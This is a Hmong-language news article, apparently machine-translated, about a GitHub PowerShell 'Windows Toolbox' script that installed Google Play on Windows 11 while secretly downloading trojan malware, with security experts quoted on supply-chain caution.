Key Takeaways
- Ib lub cuab yeej phem thawb malware hauv qhov kev ua kom yooj yim rau kev teeb tsa Android apps hauv Windows.
- Lub cuab yeej ua haujlwm raws li kev tshaj tawm, yog li nws tsis tau tsa chij liab.
-
Cov kws tshaj lij qhia cov neeg siv cov software rub tawm los ntawm cov chaw thib peb nrog kev saib xyuas zoo tshaj plaws.
Tsuas yog vim qhov qhib software cov cai muaj rau leej twg pom, tsis tau txhais hais tias txhua tus saib nws.
Kev ua kom zoo dua ntawm qhov no, cov neeg nyiag nkas tau xaiv tus thib peb Windows 11 ToolBox tsab ntawv los faib cov malware. Nyob rau saum npoo, lub app ua haujlwm raws li tau tshaj tawm thiab pab ntxiv Google Play Store rau Windows 11. Txawm li cas los xij, tom qab qhov xwm txheej, nws kuj kis tau cov khoos phis tawj uas nws tau khiav nrog txhua yam malware.
"Yog tias muaj qee cov lus qhia uas tuaj yeem coj los ntawm qhov no, nws yog qhov kev rub code kom khiav tawm hauv is taws nem xav tau kev tshuaj xyuas ntxiv," John Hammond, Senior Security Researcher ntawm Huntress, hais rau Lifewire hauv email.
Hnub ci tub sab
Ib qho ntawm qhov xav tau tshaj plaws ntawm Windows 11 yog nws lub peev xwm los khiav Android apps ncaj qha los ntawm Windows. Txawm li cas los xij, thaum kawg tso tawm cov yeeb yaj kiab, tib neeg raug txwv rau kev txhim kho ib txhais tes ntawm curated apps los ntawm Amazon App Store thiab tsis yog Google Play Store raws li tib neeg tau cia siab.
Muaj qee qhov kev so txij li Windows Subsystem rau Android tso cai rau tib neeg mus rau sideload apps nrog kev pab los ntawm Android Debug Choj (adb), hauv cov ntsiab lus tso cai rau kev teeb tsa ntawm ib qho Android app hauv Windows 11.
Apps sai sai tau pib tshwm rau ntawm GitHub, xws li Windows Subsystem rau Android Toolbox, uas yooj yim txhim kho ib qho Android app hauv Windows 11. Ib qho xws li app hu ua Powershell Windows Toolbox kuj muaj peev xwm nrog rau ntau yam kev xaiv., piv txwv li, tshem tawm tsam plab los ntawm Windows 11 kev teeb tsa, tweak nws rau kev ua tau zoo, thiab ntau dua.
Txawm li cas los xij, thaum lub app ua haujlwm raws li tau tshaj tawm, tsab ntawv tau nyiag ua haujlwm ntawm obfuscated, siab phem PowerShell scripts rau nruab ib lub trojan thiab lwm yam malware.
Yog tias muaj ib qho lus qhia uas tuaj yeem coj los ntawm qhov no, nws yog qhov rub code kom khiav tawm hauv internet xav tau kev tshuaj xyuas ntxiv.
Tsab ntawv cov cai tau qhib qhov chaw, tab sis ua ntej ib tus neeg cuam tshuam los saib nws cov lej kom pom cov lej tsis meej uas rub tawm cov malware, tsab ntawv tau teev ntau pua rub tawm. Tab sis txij li tsab ntawv ua haujlwm raws li tau tshaj tawm, tsis muaj leej twg pom ib yam dab tsi tsis zoo.
Siv tus piv txwv ntawm 2020's SolarWinds phiaj los nqis tes uas kis tau ntau lub koomhaum tseemfwv, Garret Grajek, CEO ntawm YouAttest, tau xav tias cov neeg nyiag nkas tau pom txoj hauv kev zoo tshaj plaws kom tau malware rau hauv peb lub computer yog kom peb nruab nws tus kheej.
"Txuas yog los ntawm kev yuav khoom xws li SolarWinds lossis los ntawm qhov chaw qhib, yog tias cov neeg nyiag nkag tuaj yeem tau txais lawv cov cai rau hauv 'kev raug cai' software, lawv tuaj yeem txuag kev siv zog thiab kev siv nyiaj los ntawm kev siv xoom-hnub hacks thiab nrhiav qhov tsis zoo, " Grajek hais rau Lifewire ntawm email.
Nasser Fattah, North America Thawj Tswj Hwm Pawg Thawj Coj ntawm Kev Tshawb Fawb Sib Koom, ntxiv tias nyob rau hauv rooj plaub ntawm Powershell Windows Toolbox, trojan malware tau xa tawm ntawm nws cov lus cog tseg tab sis muaj tus nqi zais.
"Zoo trojan malware yog ib qho uas muab tag nrho cov peev xwm thiab kev ua haujlwm uas nws tshaj tawm nws ua … ntxiv rau ntau (malware), "Fattah hais rau Lifewire dhau email.
Fattah kuj tau taw qhia tias txoj haujlwm siv Powershell tsab ntawv yog thawj lub cim uas ua rau nws npau taws."Peb yuav tsum tau ceev faj heev ntawm kev khiav ib qho Powershell scripts los ntawm is taws nem. Hackers muaj thiab yuav txuas ntxiv siv Powershell los faib malware," ceeb toom Fattah.
Hammond pom zoo. Perusing los ntawm cov ntaub ntawv ntawm qhov project uas tam sim no tau raug coj mus offline los ntawm GitHub, qhov kev tawm tswv yim ntawm kev pib ib qho kev sib txuas lus nrog cov cai tswj hwm, thiab khiav ib kab ntawm cov cai uas nqa thiab khiav code los ntawm Is Taws Nem, yog qhov teeb tsa lub tswb ceeb toom rau nws..
Shared lub luag haujlwm
David Cundiff, tus thawj coj saib xyuas kev ruaj ntseg ntawm Cyvatar, ntseeg tias muaj ntau zaj lus qhia uas tib neeg tuaj yeem kawm los ntawm qhov zoo li qub-nrog-siab phem-hauv software.
"Kev nyab xeeb yog lub luag haujlwm sib koom raws li tau piav qhia ntawm GitHub tus kheej txoj hauv kev ruaj ntseg," taw qhia Cundiff. "Qhov no txhais tau hais tias tsis muaj ib lub koom haum yuav tsum tso siab rau ib qho ntawm qhov tsis ua tiav hauv cov saw hlau."
Tsis tas li ntawd, nws tau qhia tias txhua tus neeg uas rub tawm cov lej los ntawm GitHub yuav tsum khaws lawv lub qhov muag tev tawm rau cov cim ceeb toom, ntxiv tias qhov xwm txheej yuav rov ua dua nws tus kheej yog tias tib neeg ua haujlwm raws li kev xav tias txhua yam yuav nyob hauv kev txiav txim txij li software tau tuav. lub platform uas ntseeg siab thiab muaj koob npe nrov.
"Thaum Github yog lub npe nrov code sib koom platform, cov neeg siv tuaj yeem faib cov cuab yeej kev ruaj ntseg rau qhov zoo, thiab qhov phem," pom zoo Hammond.